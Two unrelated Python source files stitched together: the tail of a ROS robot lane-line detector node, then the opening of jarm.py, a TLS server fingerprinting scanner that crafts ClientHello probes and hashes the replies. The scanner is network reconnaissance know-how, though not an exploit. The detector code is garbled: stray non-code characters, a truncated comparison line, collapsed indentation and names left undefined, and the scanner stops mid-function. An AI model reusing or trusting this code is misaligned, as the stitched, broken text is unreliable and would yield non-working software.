    self.top_cutoff = rospy.get_param('~top_cutoff')
    if self.detector is None:
        cfg = rospy.get_param('~detector')
        # Expect [class_name, kwargs] as provided by the launch file.
        assert isinstance(cfg, list) and len(cfg) == 2, cfg
        self.loginfo('new detector config: %s' % str(cfg))
        self.detector = instantiate(cfg[0], cfg[1])
    # Debug publishers are created lazily, only once verbose mode turns on.
    if self.verbose and self.pub_edge is None:
        self.pub_edge = rospy.Publisher("~edge", Image, queue_size=1)
        self.pub_colorSegment = rospy.Publisher("~colorSegment", Image, queue_size=1)
def cbSwitch(self, switch_msg):
    # FSM switch: when False, cbImage drops frames without processing.
    self.active = switch_msg.data
def cbImage(self, image_msg):
self.stats.received()
if not self.active:
return
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def cbTransform(self, transform_msg):
self.ai.shift = transform_msg.s[0:3]
self.ai.scale = transform_msg.s[3:6]
self.loginfo("AntiInstagram transform received")
def loginfo(self, s):
    # Prefix every log line with the node name for multi-node launches.
    rospy.loginfo('[%s] %s' % (self.node_name, s))
def intermittent_log_now(self):
return self.intermittent_counter % self.intermittent_interval == 1
def intermittent_log(self, s):
if not self.intermittent_log_now():
return
self.loginfo('%3d:%s' % (self.intermittent_counter, s))
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
self.stats.skipped()
# Return immediately if the thread is locked
return
try:
self.processImage_(image_msg)
finally:
# Release the thread lock
self.thread_lock.release()
def processImage_(self, image_msg):
    """Decode, colour-correct, and scan one frame for yellow/blue lane lines.

    Publishes a SegmentList of accepted yellow segments and, when verbose,
    a debug image with the accepted lines drawn on it.

    Fixes vs. original: the original read `yellow.lines` (but `yellow` is a
    plain mask ndarray) and the never-defined names `white`, `red`, and
    `self.detector.edges`, all of which raise at runtime.
    """
    self.stats.processed()
    if self.intermittent_log_now():
        self.intermittent_log(self.stats.info())
        self.stats.reset()
    tk = TimeKeeper(image_msg)
    self.intermittent_counter += 1
    # Decode from compressed image with OpenCV
    try:
        image_cv = image_cv_from_jpg(image_msg.data)
    except ValueError as e:
        self.loginfo('Could not decode image: %s' % e)
        return
    tk.completed('decoded')
    # Resize and crop image
    hei_original, wid_original = image_cv.shape[0:2]
    if self.image_size[0] != hei_original or self.image_size[1] != wid_original:
        image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]),
                              interpolation=cv2.INTER_NEAREST)
    image_cv = image_cv[self.top_cutoff:, :, :]
    tk.completed('resized')
    # apply color correction: AntiInstagram
    image_cv_corr = self.ai.applyTransform(image_cv)
    image_cv_corr = cv2.convertScaleAbs(image_cv_corr)
    tk.completed('corrected')
    # Edge map plus yellow/blue colour masks (dilated to close small gaps).
    gray = cv2.cvtColor(image_cv_corr, cv2.COLOR_BGR2GRAY)
    edges = cv2.Canny(gray, 80, 200, apertureSize=3)
    hsv = cv2.cvtColor(image_cv_corr, cv2.COLOR_BGR2HSV)
    # NOTE(review): hsv_yellow1/2 and hsv_blue1/2 come from a star import —
    # confirm which module defines them.
    yellow = cv2.inRange(hsv, hsv_yellow1, hsv_yellow2)
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
    yellow = cv2.dilate(yellow, kernel)
    blue = cv2.inRange(hsv, hsv_blue1, hsv_blue2)
    blue = cv2.dilate(blue, kernel)
    # Detect lines and normals on the yellow edge mask
    edge_color_yellow = cv2.bitwise_and(yellow, edges)
    lines_yellow = cv2.HoughLinesP(edge_color_yellow, 1, np.pi / 180, 10, np.empty(1), 3, 1)
    if lines_yellow is not None:
        lines_yellow = np.array(lines_yellow[0])
    else:
        lines_yellow = []
    bw_yellow = yellow
    lines_yellow, normals_yellow = self.normals(lines_yellow, bw_yellow)
    tk.completed('detected')
    # SegmentList constructor
    segmentList = SegmentList()
    segmentList.header.stamp = image_msg.header.stamp
    # Convert to normalized pixel coordinates, and add segments to segmentList
    # (fixed: was len(yellow.lines) on the mask ndarray).
    if len(lines_yellow) > 0:
        segmentList.segments.extend(self.toSegmentMsg(lines_yellow, normals_yellow, Segment.YELLOW))
    # Fixed: only yellow is detected here; white/red were undefined names.
    self.intermittent_log('# segments: yellow %3d' % len(lines_yellow))
    tk.completed('prepared')
    # Publish segmentList
    self.pub_lines.publish(segmentList)
    tk.completed('--pub_lines--')
    # VISUALIZATION only below
    if self.verbose:
        # Draw the lines that sit on a blue/yellow colour boundary.
        image_with_lines = np.copy(image_cv_corr)
        for x1, y1, x2, y2 in lines_yellow:
            cx = int((x1 + x2) / 2)
            cy = int((y1 + y2) / 2)
            # Clamp so the +/-1 pixel probes stay inside a 160-wide image.
            cx = min(max(cx, 1), 158)
            if (blue[cy, cx - 1] == 255 and yellow[cy, cx + 1] == 255) or \
               (yellow[cy, cx - 1] == 255 and blue[cy, cx + 1] == 255):
                cv2.line(image_with_lines, (x1, y1), (x2, y2), (0, 0, 255), 2)
                cv2.circle(image_with_lines, (x1, y1), 2, (0, 255, 0))
                cv2.circle(image_with_lines, (x2, y2), 2, (0, 0, 255))
        tk.completed('drawn')
        # Publish the frame with lines
        image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
        image_msg_out.header.stamp = image_msg.header.stamp
        self.pub_image.publish(image_msg_out)
        tk.completed('pub_image')
        # Debug topics are only advertised in verbose mode (see updateParams).
        if self.pub_edge is not None:
            # Fixed: original used undefined white/red masks and
            # self.detector.edges; publish what was computed above instead.
            colorSegment = color_segment(np.zeros_like(yellow), np.zeros_like(yellow), yellow)
            edge_msg_out = self.bridge.cv2_to_imgmsg(edges, "mono8")
            colorSegment_msg_out = self.bridge.cv2_to_imgmsg(colorSegment, "bgr8")
            self.pub_edge.publish(edge_msg_out)
            self.pub_colorSegment.publish(colorSegment_msg_out)
            tk.completed('pub_edge/pub_segment')
    self.intermittent_log(tk.getall())
def onShutdown(self):
    # Nothing to clean up; just log the shutdown.
    self.loginfo("Shutdown.")
def toSegmentMsg(self, lines, normals, color):
    """Convert pixel-space lines + normals into normalized Segment messages.

    NOTE(review): 'blue' and 'yellow' below are NOT defined in this scope
    (they are locals of processImage_), so the colour-adjacency filter
    would raise NameError at runtime — confirm the intended data flow.
    """
    # Undo the top crop, then scale into [0, 1] image coordinates.
    arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
    arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
    segmentMsgList = []
    for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
        cx= int((x1+x2)/2)
        cy= int((y1+y2)/2)
        # Clamp the midpoint so the +/-1 pixel probes stay in a 160-wide image.
        if cx >158:
            cx = 158
        elif cx <1:
            cx = 1
        # Keep only segments whose midpoint sits on a blue/yellow colour edge.
        if (blue[cy,cx-1] == 255 and yellow[cy,cx+1] ==255) or (yellow[cy,cx-1] == 255 and blue[cy,cx+1] ==255):
            [x1,y1,x2,y2] = (([x1,y1,x2,y2] + arr_cutoff) * arr_ratio)
            segment = Segment()
            segment.color = color
            segment.pixels_normalized[0].x = x1
            segment.pixels_normalized[0].y = y1
            segment.pixels_normalized[1].x = x2
            segment.pixels_normalized[1].y = y2
            segment.normal.x = norm_x
            segment.normal.y = norm_y
            segmentMsgList.append(segment)
    return segmentMsgList
def normals(lines,bw):
if len(lines) >0:
normals = []
centers = []
#find the dx dy
length = np.sum((lines[:, 0:2] -lines[:, 2:4])**2, axis=1, keepdims=True)**0.5
dx = 1.* (lines[:,3:4]-lines[:,1:2])/length
dy = 1.* (lines[:,0:1]-lines[:,2:3])/length
centers = np.hstack([(lines[:,0:1]+lines[:,2:3])/2, (lines[:,1:2]+lines[:,3:4])/2])
x3 = (centers[:,0:1] - 3.*dx).astype('int')
x3[x3<0]=0
x3[x3>=160]=160-1
y3 = (centers[:,1:2] - 3.*dy).astype('int')
y3[y3<0]=0
y3[y3>=120]=120-1
x4 = (centers[:,0:1] + 3.*dx).astype('int')
x4[x4<0]=0
x4[x4>=160]=160-1
โ
y4 = (centers[:,1:2] + 3.*dy).astype('int')
y4[y4<0]=0
y4[y4>=120]=120-1
โ
flag_signs = (np.logical_and(bw[y3,x3]>0, bw[y4,x4]==0)).astype('int')*2-1
normals = np.hstack([dx, dy]) * flag_signs
flag = ((lines[:,2]-lines[:,0])*normals[:,1] - (lines[:,3]-lines[:,1])*normals[:,0])>
for i in range(len(lines)):
if flag[i]:
x1,y1,x2,y2 = lines[i, :]
lines[i, :] = [x2,y2,x1,y1]
return lines,normals
class Stats():
    """Frame-rate accounting for received/processed/skipped images."""

    def __init__(self):
        self.nresets = 0
        self.reset()

    def reset(self):
        """Start a new accounting window."""
        self.nresets += 1
        self.t0 = time.time()
        self.nreceived = 0
        self.nskipped = 0
        self.nprocessed = 0

    def received(self):
        # Announce only the very first frame of the very first window.
        if self.nreceived == 0 and self.nresets == 1:
            rospy.loginfo('line_detector_node received first image.')
        self.nreceived += 1

    def skipped(self):
        self.nskipped += 1

    def processed(self):
        if self.nprocessed == 0 and self.nresets == 1:
            rospy.loginfo('line_detector_node processing first image.')
        self.nprocessed += 1

    def info(self):
        """One-line summary of the current window with per-second rates."""
        elapsed = time.time() - self.t0
        skipped_perc = (100.0 * self.nskipped / self.nreceived) if self.nreceived else 0

        def fps(x):
            return '%.1f fps' % (x / elapsed)

        return ('In the last %.1f s: received %d (%s) processed %d (%s) skipped %d (%s) (%1.f%%)'
                % (elapsed, self.nreceived, fps(self.nreceived),
                   self.nprocessed, fps(self.nprocessed),
                   self.nskipped, fps(self.nskipped), skipped_perc))
if __name__ == '__main__':
    # Standard ROS entry point: init node, hook shutdown, hand control to ROS.
    rospy.init_node('line_detector',anonymous=False)
    line_detector_node = LineDetectorNode()
    rospy.on_shutdown(line_detector_node.onShutdown)
    rospy.spin()
|
jarm.py | # Version 1.0 (November 2020)
#
# Created by:
# John Althouse
# Andrew Smart
# RJ Nunaly
# Mike Brady
#
# Converted to Python by:
# Caleb Yu
#
# Added multiprocessing by:
# Leo M. Falcon (https://github.com/A3sal0n)
#
# Copyright (c) 2020, salesforce.com, inc.
# All rights reserved.
# Licensed under the BSD 3-Clause license.
# For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
from __future__ import print_function
import codecs
import socket
import struct
import os
import sys
import random
import argparse
import hashlib
import ipaddress
import time
from queue import Queue
from threading import Thread
# CLI definition: a positional scan target XOR an input file of targets.
parser = argparse.ArgumentParser(description="Enter an IP address and port to scan.")
group = parser.add_mutually_exclusive_group()
group.add_argument("scan", nargs='?', help="Enter an IP or domain to scan.")
group.add_argument("-i", "--input", help="Provide a list of IP addresses or domains to scan, one domain or IP address per line. Optional: Specify port to scan with comma separation (e.g. 8.8.4.4,853).", type=str)
parser.add_argument("-p", "--port", help="Enter a port to scan (default 443).", type=int)
parser.add_argument("-v", "--verbose", help="Verbose mode: displays the JARM results before being hashed.", action="store_true")
parser.add_argument("-V", "--version", help="Print out version and exit.", action="store_true")
parser.add_argument("-o", "--output", help="Provide a filename to output/append results to a CSV file.", type=str)
parser.add_argument("-j", "--json", help="Output ndjson (either to file or stdout; overrides --output defaults to CSV)", action="store_true")
parser.add_argument("-P", "--proxy", help="To use a SOCKS5 proxy, provide address:port.", type=str)
args = parser.parse_args()
if args.version:
    print("JARM version 1.0")
    exit()
# One of the two target sources is mandatory.
if not (args.scan or args.input):
    parser.error("A domain/IP to scan or an input file is required.")
def choose_grease():
    """Pick a random GREASE value (RFC 8701): two identical bytes 0x?A."""
    grease_values = [
        b"\x0a\x0a", b"\x1a\x1a", b"\x2a\x2a", b"\x3a\x3a",
        b"\x4a\x4a", b"\x5a\x5a", b"\x6a\x6a", b"\x7a\x7a",
        b"\x8a\x8a", b"\x9a\x9a", b"\xaa\xaa", b"\xba\xba",
        b"\xca\xca", b"\xda\xda", b"\xea\xea", b"\xfa\xfa",
    ]
    return random.choice(grease_values)
def packet_building(jarm_details):
    """Assemble one raw TLS ClientHello record for a JARM probe.

    jarm_details: [host, port, version, cipher_list, cipher_order, grease,
                   alpn, support, extension_order]. Returns the complete
    record-layer payload as bytes.
    """
    # (record-layer version, hello version) per probed protocol.
    versions = {
        "TLS_1.3": (b"\x03\x01", b"\x03\x03"),
        "SSLv3":   (b"\x03\x00", b"\x03\x00"),
        "TLS_1":   (b"\x03\x01", b"\x03\x01"),
        "TLS_1.1": (b"\x03\x02", b"\x03\x02"),
        "TLS_1.2": (b"\x03\x03", b"\x03\x03"),
    }
    record_version, hello_version = versions[jarm_details[2]]
    payload = b"\x16" + record_version
    client_hello = hello_version
    # 32 random bytes plus a random legacy session id.
    client_hello += os.urandom(32)
    session_id = os.urandom(32)
    client_hello += struct.pack(">B", len(session_id))
    client_hello += session_id
    # Cipher suites for this probe.
    cipher_choice = get_ciphers(jarm_details)
    client_hello += struct.pack(">H", len(cipher_choice))
    client_hello += cipher_choice
    client_hello += b"\x01"  # compression methods length
    client_hello += b"\x00"  # null compression
    # Extensions for this probe.
    client_hello += get_extensions(jarm_details)
    # Wrap in handshake (type 0x01, 3-byte length) and record headers.
    handshake_protocol = b"\x01" + b"\x00" + struct.pack(">H", len(client_hello)) + client_hello
    payload += struct.pack(">H", len(handshake_protocol))
    payload += handshake_protocol
    return payload
def get_ciphers(jarm_details):
    """Return the concatenated cipher-suite bytes for this probe.

    Fixes vs. original: the cipher table was bound to the name 'list',
    shadowing the builtin (renamed); the manual concat loop is replaced
    with b"".join.
    """
    #Two cipher lists: NO1.3 and ALL
    if jarm_details[3] == "ALL":
        cipher_list = [b"\x00\x16", b"\x00\x33", b"\x00\x67", b"\xc0\x9e", b"\xc0\xa2", b"\x00\x9e", b"\x00\x39", b"\x00\x6b", b"\xc0\x9f", b"\xc0\xa3", b"\x00\x9f", b"\x00\x45", b"\x00\xbe", b"\x00\x88", b"\x00\xc4", b"\x00\x9a", b"\xc0\x08", b"\xc0\x09", b"\xc0\x23", b"\xc0\xac", b"\xc0\xae", b"\xc0\x2b", b"\xc0\x0a", b"\xc0\x24", b"\xc0\xad", b"\xc0\xaf", b"\xc0\x2c", b"\xc0\x72", b"\xc0\x73", b"\xcc\xa9", b"\x13\x02", b"\x13\x01", b"\xcc\x14", b"\xc0\x07", b"\xc0\x12", b"\xc0\x13", b"\xc0\x27", b"\xc0\x2f", b"\xc0\x14", b"\xc0\x28", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x76", b"\xc0\x77", b"\xcc\xa8", b"\x13\x05", b"\x13\x04", b"\x13\x03", b"\xcc\x13", b"\xc0\x11", b"\x00\x0a", b"\x00\x2f", b"\x00\x3c", b"\xc0\x9c", b"\xc0\xa0", b"\x00\x9c", b"\x00\x35", b"\x00\x3d", b"\xc0\x9d", b"\xc0\xa1", b"\x00\x9d", b"\x00\x41", b"\x00\xba", b"\x00\x84", b"\x00\xc0", b"\x00\x07", b"\x00\x04", b"\x00\x05"]
    elif jarm_details[3] == "NO1.3":
        cipher_list = [b"\x00\x16", b"\x00\x33", b"\x00\x67", b"\xc0\x9e", b"\xc0\xa2", b"\x00\x9e", b"\x00\x39", b"\x00\x6b", b"\xc0\x9f", b"\xc0\xa3", b"\x00\x9f", b"\x00\x45", b"\x00\xbe", b"\x00\x88", b"\x00\xc4", b"\x00\x9a", b"\xc0\x08", b"\xc0\x09", b"\xc0\x23", b"\xc0\xac", b"\xc0\xae", b"\xc0\x2b", b"\xc0\x0a", b"\xc0\x24", b"\xc0\xad", b"\xc0\xaf", b"\xc0\x2c", b"\xc0\x72", b"\xc0\x73", b"\xcc\xa9", b"\xcc\x14", b"\xc0\x07", b"\xc0\x12", b"\xc0\x13", b"\xc0\x27", b"\xc0\x2f", b"\xc0\x14", b"\xc0\x28", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x76", b"\xc0\x77", b"\xcc\xa8", b"\xcc\x13", b"\xc0\x11", b"\x00\x0a", b"\x00\x2f", b"\x00\x3c", b"\xc0\x9c", b"\xc0\xa0", b"\x00\x9c", b"\x00\x35", b"\x00\x3d", b"\xc0\x9d", b"\xc0\xa1", b"\x00\x9d", b"\x00\x41", b"\x00\xba", b"\x00\x84", b"\x00\xc0", b"\x00\x07", b"\x00\x04", b"\x00\x05"]
    #Change cipher order
    if jarm_details[4] != "FORWARD":
        cipher_list = cipher_mung(cipher_list, jarm_details[4])
    #Add GREASE to beginning of cipher list (if applicable)
    if jarm_details[5] == "GREASE":
        cipher_list.insert(0, choose_grease())
    return b"".join(cipher_list)
def cipher_mung(ciphers, request):
    """Reorder *ciphers* according to the JARM ordering *request*.

    Supported requests: REVERSE, BOTTOM_HALF, TOP_HALF, MIDDLE_OUT.
    Any other value yields an empty list (mirroring the original).
    """
    count = len(ciphers)
    mid = int(count / 2)
    if request == "REVERSE":
        return ciphers[::-1]
    if request == "BOTTOM_HALF":
        # Odd-length lists give the middle element to the top half.
        start = mid + 1 if count % 2 == 1 else mid
        return ciphers[start:]
    if request == "TOP_HALF":
        # Top half is the reversed first half, middle element first if odd.
        result = [ciphers[mid]] if count % 2 == 1 else []
        result += cipher_mung(cipher_mung(ciphers, "REVERSE"), "BOTTOM_HALF")
        return result
    if request == "MIDDLE_OUT":
        # Alternate outward from the centre; second half before first half.
        result = []
        if count % 2 == 1:
            result.append(ciphers[mid])
            for i in range(1, mid + 1):
                result.append(ciphers[mid + i])
                result.append(ciphers[mid - i])
        else:
            for i in range(1, mid + 1):
                result.append(ciphers[mid - 1 + i])
                result.append(ciphers[mid - i])
        return result
    return []
def get_extensions(jarm_details):
    """Assemble the full ClientHello extensions block for this probe."""
    parts = []
    use_grease = jarm_details[5] == "GREASE"
    if use_grease:
        # GREASE extension type with an empty body.
        parts.append(choose_grease() + b"\x00\x00")
    # Server name (SNI).
    parts.append(extension_server_name(jarm_details[0]))
    parts.append(b"\x00\x17\x00\x00")          # extended_master_secret
    parts.append(b"\x00\x01\x00\x01\x01")      # max_fragment_length
    parts.append(b"\xff\x01\x00\x01\x00")      # renegotiation_info
    parts.append(b"\x00\x0a\x00\x0a\x00\x08\x00\x1d\x00\x17\x00\x18\x00\x19")  # supported_groups
    parts.append(b"\x00\x0b\x00\x02\x01\x00")  # ec_point_formats
    parts.append(b"\x00\x23\x00\x00")          # session_ticket
    # Application Layer Protocol Negotiation.
    parts.append(app_layer_proto_negotiation(jarm_details))
    parts.append(b"\x00\x0d\x00\x14\x00\x12\x04\x03\x08\x04\x04\x01\x05\x03\x08\x05\x05\x01\x08\x06\x06\x01\x02\x01")  # signature_algorithms
    # Key share (may carry a GREASE group).
    parts.append(key_share(use_grease))
    parts.append(b"\x00\x2d\x00\x02\x01\x01")  # psk_key_exchange_modes
    # Supported versions only when the probe advertises version support.
    if (jarm_details[2] == "TLS_1.3") or (jarm_details[7] == "1.2_SUPPORT"):
        parts.append(supported_versions(jarm_details, use_grease))
    all_extensions = b"".join(parts)
    return struct.pack(">H", len(all_extensions)) + all_extensions
def extension_server_name(host):
    """Build the SNI extension (type 0x0000) for *host*."""
    name_len = len(host)
    # Extension data: list length (+3), entry type 0x00, name length, name.
    ext = b"\x00\x00"
    ext += struct.pack(">H", name_len + 5)
    ext += struct.pack(">H", name_len + 3)
    ext += b"\x00"
    ext += struct.pack(">H", name_len)
    ext += host.encode()
    return ext
def app_layer_proto_negotiation(jarm_details):
    """Build the ALPN extension (type 0x0010) for this probe."""
    if (jarm_details[6] == "RARE_APLN"):
        # Uncommon protocols only (h2 and http/1.1 removed).
        alpns = [b"\x08\x68\x74\x74\x70\x2f\x30\x2e\x39", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x30", b"\x06\x73\x70\x64\x79\x2f\x31", b"\x06\x73\x70\x64\x79\x2f\x32", b"\x06\x73\x70\x64\x79\x2f\x33", b"\x03\x68\x32\x63", b"\x02\x68\x71"]
    else:
        # All protocols, ordered weakest to strongest.
        alpns = [b"\x08\x68\x74\x74\x70\x2f\x30\x2e\x39", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x30", b"\x08\x68\x74\x74\x70\x2f\x31\x2e\x31", b"\x06\x73\x70\x64\x79\x2f\x31", b"\x06\x73\x70\x64\x79\x2f\x32", b"\x06\x73\x70\x64\x79\x2f\x33", b"\x02\x68\x32", b"\x03\x68\x32\x63", b"\x02\x68\x71"]
    # The ALPN list may be reordered exactly like the cipher list.
    if jarm_details[8] != "FORWARD":
        alpns = cipher_mung(alpns, jarm_details[8])
    payload = b"".join(alpns)
    ext = b"\x00\x10"
    ext += struct.pack(">H", len(payload) + 2)
    ext += struct.pack(">H", len(payload))
    ext += payload
    return ext
def key_share(grease):
    """Build the key_share extension (x25519 with a random 32-byte key)."""
    body = b""
    if grease:
        # GREASE group with a 1-byte dummy key.
        body += choose_grease() + b"\x00\x01\x00"
    body += b"\x00\x1d"  # group: x25519
    body += b"\x00\x20"  # key exchange length: 32
    body += os.urandom(32)
    ext = b"\x00\x33"
    ext += struct.pack(">H", len(body) + 2)
    ext += struct.pack(">H", len(body))
    ext += body
    return ext
def supported_versions(jarm_details, grease):
    """Build the supported_versions extension (type 0x002b) for this probe."""
    if (jarm_details[7] == "1.2_SUPPORT"):
        # Advertise up to TLS 1.2 only.
        tls_versions = [b"\x03\x01", b"\x03\x02", b"\x03\x03"]
    else:
        # Advertise TLS 1.3 as well.
        tls_versions = [b"\x03\x01", b"\x03\x02", b"\x03\x03", b"\x03\x04"]
    # Default order is oldest-to-newest; may be munged like the ciphers.
    if jarm_details[8] != "FORWARD":
        tls_versions = cipher_mung(tls_versions, jarm_details[8])
    body = choose_grease() if grease else b""
    body += b"".join(tls_versions)
    ext = b"\x00\x2b"
    ext += struct.pack(">H", len(body) + 1)
    ext += struct.pack(">B", len(body))
    ext += body
    return ext
#Send the assembled client hello using a socket
def send_packet(packet,dhost):
    """Send *packet* to dhost:destination_port and return (response, ip).

    Returns (bytearray, ip) on success, ("TIMEOUT", ip) on socket timeout,
    or (None, ip) on any other error. Relies on the module-level
    destination_port, args and — when proxying — socks/proxyhost/proxyport.

    NOTE(review): if connect() fails before 'sock' or 'ip' is bound, the
    except handlers reference unbound locals — confirm intended.
    """
    try:
        #Determine if the input is an IP or domain name
        try:
            if (type(ipaddress.ip_address(dhost)) == ipaddress.IPv4Address) or (type(ipaddress.ip_address(dhost)) == ipaddress.IPv6Address):
                raw_ip = True
                ip = (dhost, destination_port)
        except ValueError as e:
            # Not a literal IP: resolve later via the connected socket.
            ip = (None, None)
            raw_ip = False
        #Connect the socket
        if ":" in dhost:
            # IPv6 literal.
            if args.proxy:
                sock = socks.socksocket(socket.AF_INET6, socket.SOCK_STREAM)
                sock.set_proxy(socks.SOCKS5, proxyhost, proxyport)
            else:
                sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            #Timeout of 20 seconds
            sock.settimeout(20)
            sock.connect((dhost, destination_port, 0, 0))
        else:
            if args.proxy:
                sock = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                sock.set_proxy(socks.SOCKS5, proxyhost, proxyport)
            else:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #Timeout of 20 seconds
            sock.settimeout(20)
            sock.connect((dhost, destination_port))
        #Resolve IP if given a domain name
        if raw_ip == False:
            ip = sock.getpeername()
            # Retry IP resolution if it fails on the first attempt
            # NOTE(review): the retry loop has no break on success, so it
            # always runs all 5 rounds — confirm intended.
            if not ip:
                for i in range(5):
                    ip = sock.getpeername()
                    time.sleep(0.2)
        sock.sendall(packet)
        #Receive server hello
        data = sock.recv(1484)
        #Close socket
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
        return bytearray(data), ip[0]
    #Timeout errors result in an empty hash
    except socket.timeout as e:
        sock.close()
        return "TIMEOUT", ip[0]
    except Exception as e:
        sock.close()
        return None, ip[0]
def read_packet(data, jarm_details):
    """Decode a server response into 'cipher|version|alpn|extensions' form.

    Any absent, alert, or malformed response yields the empty marker '|||'.
    """
    empty = "|||"
    try:
        if data is None:
            return empty
        if data[0] == 21:
            # Alert record: the handshake was rejected.
            return empty
        if (data[0] == 22) and (data[5] == 2):
            # Handshake record containing a ServerHello.
            server_hello_length = int.from_bytes(data[3:5], "big")
            counter = data[43]
            # Server's selected cipher sits just past the session id.
            selected_cipher = data[counter + 44:counter + 46]
            version = data[9:11]
            cipher_hex = codecs.encode(selected_cipher, 'hex').decode('ascii')
            version_hex = codecs.encode(version, 'hex').decode('ascii')
            extensions = extract_extension_info(data, counter, server_hello_length)
            return "%s|%s|%s" % (cipher_hex, version_hex, extensions)
        return empty
    except Exception:
        # Anything unexpected counts as "no usable answer".
        return empty
def extract_extension_info(data, counter, server_hello_length):
    """Return 'alpn|ext1-ext2-...' parsed from a ServerHello's extensions."""
    try:
        # Responses with nothing parseable yield the empty marker.
        if (data[counter + 47] == 11):
            return "|"
        if (data[counter + 50:counter + 53] == b"\x0e\xac\x0b") or (data[82:85] == b"\x0f\xf0\x0b"):
            return "|"
        if counter + 42 >= server_hello_length:
            return "|"
        # Walk the extension list, collecting (type, value) pairs.
        position = 49 + counter
        total_length = int(codecs.encode(data[counter + 47:counter + 49], 'hex'), 16)
        limit = total_length + (position - 1)
        types = []
        values = []
        while position < limit:
            types.append(data[position:position + 2])
            ext_length = int(codecs.encode(data[position + 2:position + 4], 'hex'), 16)
            if ext_length == 0:
                values.append("")
                position += 4
            else:
                values.append(data[position + 4:position + 4 + ext_length])
                position += ext_length + 4
        # ALPN value first, then the hyphen-joined extension type codes.
        alpn = find_extension(b"\x00\x10", types, values)
        hex_types = [codecs.encode(t, 'hex').decode('ascii') for t in types]
        return str(alpn) + "|" + "-".join(hex_types)
    except IndexError:
        # Truncated data: treat as unparseable.
        return "|"
def find_extension(ext_type, types, values):
    """Return the value recorded for *ext_type*, or "" when absent.

    ALPN (0x0010) values are returned as ASCII (the protocol name, with
    its 3 length bytes skipped); everything else is hex-encoded.
    Fix vs. original: the loop index shadowed the builtin 'iter';
    rewritten with zip.
    """
    for found_type, value in zip(types, values):
        if found_type != ext_type:
            continue
        if ext_type == b"\x00\x10":
            # Skip the 3 length bytes, keep the protocol name.
            return (value[3:]).decode()
        return value.hex()
    return ""
def jarm_hash(jarm_raw):
    """Produce the 62-character JARM fuzzy hash from the raw scan string."""
    if jarm_raw == "|||,|||,|||,|||,|||,|||,|||,|||,|||,|||":
        # No probe was answered: all-zero hash.
        return "0" * 62
    fuzzy_hash = ""
    alpns_and_ext = ""
    for handshake in jarm_raw.split(","):
        cipher, version, alpn, exts = handshake.split("|")
        # First 30 chars: per-handshake cipher index + version byte.
        fuzzy_hash += cipher_bytes(cipher)
        fuzzy_hash += version_byte(version)
        alpns_and_ext += alpn
        alpns_and_ext += exts
    # Trailing 32 chars: truncated sha256 over all ALPNs and extensions.
    digest = (hashlib.sha256(alpns_and_ext.encode())).hexdigest()
    return fuzzy_hash + digest[0:32]
def cipher_bytes(cipher):
    """Map a hex cipher-suite string to its two-char table-index code.

    Fix vs. original: the table and the loop variable shadowed the
    builtins 'list' and 'bytes'; renamed. Unknown ciphers still map to
    one past the end of the table (preserved behaviour).
    """
    if cipher == "":
        return "00"
    cipher_table = [b"\x00\x04", b"\x00\x05", b"\x00\x07", b"\x00\x0a", b"\x00\x16", b"\x00\x2f", b"\x00\x33", b"\x00\x35", b"\x00\x39", b"\x00\x3c", b"\x00\x3d", b"\x00\x41", b"\x00\x45", b"\x00\x67", b"\x00\x6b", b"\x00\x84", b"\x00\x88", b"\x00\x9a", b"\x00\x9c", b"\x00\x9d", b"\x00\x9e", b"\x00\x9f", b"\x00\xba", b"\x00\xbe", b"\x00\xc0", b"\x00\xc4", b"\xc0\x07", b"\xc0\x08", b"\xc0\x09", b"\xc0\x0a", b"\xc0\x11", b"\xc0\x12", b"\xc0\x13", b"\xc0\x14", b"\xc0\x23", b"\xc0\x24", b"\xc0\x27", b"\xc0\x28", b"\xc0\x2b", b"\xc0\x2c", b"\xc0\x2f", b"\xc0\x30", b"\xc0\x60", b"\xc0\x61", b"\xc0\x72", b"\xc0\x73", b"\xc0\x76", b"\xc0\x77", b"\xc0\x9c", b"\xc0\x9d", b"\xc0\x9e", b"\xc0\x9f", b"\xc0\xa0", b"\xc0\xa1", b"\xc0\xa2", b"\xc0\xa3", b"\xc0\xac", b"\xc0\xad", b"\xc0\xae", b"\xc0\xaf", b'\xcc\x13', b'\xcc\x14', b'\xcc\xa8', b'\xcc\xa9', b'\x13\x01', b'\x13\x02', b'\x13\x03', b'\x13\x04', b'\x13\x05']
    # 1-based index of the cipher in the table (len(table)+1 if unknown).
    index = 1
    for entry in cipher_table:
        if cipher == codecs.encode(entry, 'hex').decode('ascii'):
            break
        index += 1
    # Always two hex characters, zero-padded.
    return "%02x" % index
def version_byte(version):
    """Encode the TLS minor version (last hex digit) as a letter a-f."""
    if version == "":
        return "0"
    # '0301' -> minor 1 -> 'b', '0303' -> 'd', etc.
    return "abcdef"[int(version[3:4])]
def ParseNumber(number):
    """Parse a decimal or 0x-prefixed hexadecimal port string."""
    return int(number[2:], 16) if number.startswith('0x') else int(number)
def main(q):
    """Worker thread: JARM-scan each host pulled from *q* and emit results.

    Sends the ten JARM probe ClientHellos, assembles the raw result string,
    hashes it, and writes to the shared output file (CSV or ndjson) or to
    stdout. Relies on the module-level args, destination_port and file.

    Fixes vs. original: CSV rows were prefixed with a stray '{"host":"'
    literal, and unresolved hosts wrote a malformed mixed line even in
    JSON mode.
    """
    while True:
        dhost = q.get()
        #Select the packets and formats to send
        #Array format = [destination_host,destination_port,version,cipher_list,cipher_order,GREASE,RARE_APLN,1.3_SUPPORT,extension_orders]
